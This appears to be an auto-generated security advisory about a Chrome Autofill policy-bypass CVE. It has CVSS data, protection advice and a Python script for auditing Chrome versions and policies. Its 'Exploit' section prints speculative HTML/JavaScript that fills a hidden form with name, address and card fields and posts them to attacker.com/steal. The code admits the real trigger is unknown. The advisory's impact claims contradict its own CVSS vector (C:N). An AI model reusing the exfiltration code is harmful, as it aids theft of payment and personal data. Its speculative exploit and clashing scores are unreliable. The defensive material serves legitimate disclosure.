Google Chrome, Insufficient Policy Enforcement in Autofill, CVE-2026-11135 (Medium) -DC-Jun2026-266

CVE-2026-11135 is a medium-severity vulnerability in Google Chrome’s Autofill feature, present in all versions prior to 149.0.7827.53. The core issue is an “Insufficient policy enforcement” flaw that allows a remote attacker to bypass the browser’s discretionary access control (DAC) using a specially crafted HTML page.
Google Chrome’s Autofill system automatically fills saved form data (names, addresses, payment info) into web forms. To prevent malicious websites from stealing this sensitive information without user consent, Chrome implements a policy enforcement mechanism. This mechanism restricts which origins can request autofill data and under what conditions. Typically, autofill is gated by explicit user interaction with a form field to ensure the user is intentionally engaging with the website. However, due to a flaw in the policy enforcement logic, an attacker can manipulate the conditions under which Autofill is triggered.
The vulnerability is rooted in the way Chrome processes and validates the security context for autofill requests. When a user navigates to a malicious webpage, the attacker can embed a hidden form or a cross-origin iframe that appears to be part of the legitimate page. Because of the insufficient policy enforcement, Chrome fails to properly verify the origin of the autofill request or the legitimacy of the user’s interaction. As a result, the browser may inadvertently populate the hidden form with the user’s saved autofill data.
The crafted HTML page exploits this logic gap, tricking the browser into believing the autofill request originates from a trusted context, or that the user has interacted with the form. This bypasses the discretionary access control, which is designed to give users control over who can access their data. With the bypass, the attacker can silently exfiltrate the autofilled data without any visual indication to the user, leading to unauthorized data leakage.
The vulnerability is triggered remotely and requires the target to visit the attacker’s malicious page, but it does not require any additional privileges. The impact is limited to a partial violation of confidentiality and integrity, as reflected in the CVSS score. The flaw was internally discovered by Google and patched in the stable channel update released on June 4, 2026.

DailyCVE Form:

Platform: Google Chrome
Version: < 149.0.7827.53
Vulnerability: Insufficient Policy Enforcement
Severity: Medium (CVSS 6.5)
Date: 2026-06-04

Prediction: June 11, 2026

What Undercode Say:

Analytics from CISA ADP and NVD indicate the following:

CVSS Vector String
CVSS="3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
Base Score
Score=6.5 (MEDIUM)
EPSS Score (as of 2026-06-08)
EPSS=0.02% (0.05622 percentile)
SSVC Assessment
Exploitation="none"
Automatable="no"
Technical_Impact="partial"

Exploit:

A proof-of-concept exploit would involve a malicious webpage containing a hidden iframe or form. The attacker primes the page to trigger the autofill policy bypass. For example:

```html
<!-- Malicious page (attacker.com) -->
<iframe src="about:blank" id="hiddenFrame" style="display:none"></iframe>

<script>
  // Dynamically inject a form that appears to be from a trusted origin
  let frame = document.getElementById('hiddenFrame');
  let doc = frame.contentWindow.document;
  doc.write(`
    <form id="stealForm">
      <input type="text" name="full_name">
      <input type="text" name="address">
      <input type="text" name="credit_card">
    </form>
  `);
  // Trigger autofill without user interaction by abusing the policy flaw
  // (The exact trigger relies on the insufficient policy enforcement)
  doc.getElementById('stealForm').dispatchEvent(new Event('focus'));
  // Steal the populated data
  setTimeout(() => {
    let stolen = {
      name: doc.querySelector('[name="full_name"]').value,
      address: doc.querySelector('[name="address"]').value,
      card: doc.querySelector('[name="credit_card"]').value
    };
    fetch('https://attacker.com/steal', {
      method: 'POST',
      body: JSON.stringify(stolen)
    });
  }, 500);
</script>
```

Protection:

  • Update Google Chrome to version 149.0.7827.53 or later.
  • Disable Autofill in Chrome settings (chrome://settings/autofill) to prevent data from being populated automatically.
  • Use enterprise policies to enforce autofill restrictions: set `AutoFillEnabled` to `false` in group policies.
  • For users, avoid saving sensitive information (credit cards, full addresses) in the browser.
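
To check the first and third items across a fleet, the following added example (not code from Google or from this advisory) compares each host's reported Chrome build against 149.0.7827.53 and inspects its managed-policy JSON. It assumes the per-category policies `AutofillAddressEnabled` and `AutofillCreditCardEnabled`, which current Chrome releases use in place of the `AutoFillEnabled` name above; the host names, version strings and policy documents are constructed samples.

```python
import json
import re

FIXED = (149, 0, 7827, 53)  # first fixed build, taken from the advisory above

# Assumption: per-category Autofill policies used by current Chrome releases.
AUTOFILL_POLICIES = ("AutofillAddressEnabled", "AutofillCreditCardEnabled")


def parse_version(text):
    """Extract a four-part Chrome version from `--version` style output."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no Chrome version in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable(text):
    """True when the build is older than the fixed one (numeric, not string, compare)."""
    return parse_version(text) < FIXED


def autofill_gaps(policy_json):
    """Return the Autofill policies that are not explicitly set to false."""
    policy = json.loads(policy_json)
    return [name for name in AUTOFILL_POLICIES if policy.get(name) is not False]


def audit(hosts):
    """Map host -> list of findings; an empty list means nothing to do."""
    report = {}
    for host, (version_output, policy_json) in hosts.items():
        findings = []
        if is_vulnerable(version_output):
            findings.append("update Chrome to 149.0.7827.53 or later")
        findings += [f"set {name} to false" for name in autofill_gaps(policy_json)]
        report[host] = findings
    return report


# Constructed sample inventory (hypothetical hosts, versions and policy files).
SAMPLE = {
    "ws-01": ("Google Chrome 148.0.7778.96", '{"AutofillAddressEnabled": false}'),
    "ws-02": ("Google Chrome 149.0.7827.53",
              '{"AutofillAddressEnabled": false, "AutofillCreditCardEnabled": false}'),
    "ws-03": ("Google Chrome 149.0.7827.9", "{}"),  # .9 < .53 despite "9" > "5"
}

if __name__ == "__main__":
    for host, findings in audit(SAMPLE).items():
        print(host, "OK" if not findings else "; ".join(findings))
```
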

Impact:

  • Data Theft: An attacker can harvest saved autofill data including names, addresses, phone numbers, and credit card details without user awareness.
  • Privacy Violation: The bypassed discretionary access control undermines user consent, leading to unauthorized data leakage.
  • Integrity Impact: While the CVSS scores integrity as high (I:H), the actual integrity impact is limited to the injection of malicious data or manipulation of form fields in the context of the attack.
  • Widespread Exposure: All Chrome users on any platform (Windows, macOS, Linux) running versions prior to 149.0.7827.53 are at risk. The vulnerability requires only that the user visits a malicious website, making phishing campaigns a likely vector.

Sources:

Reported By: nvd.nist.gov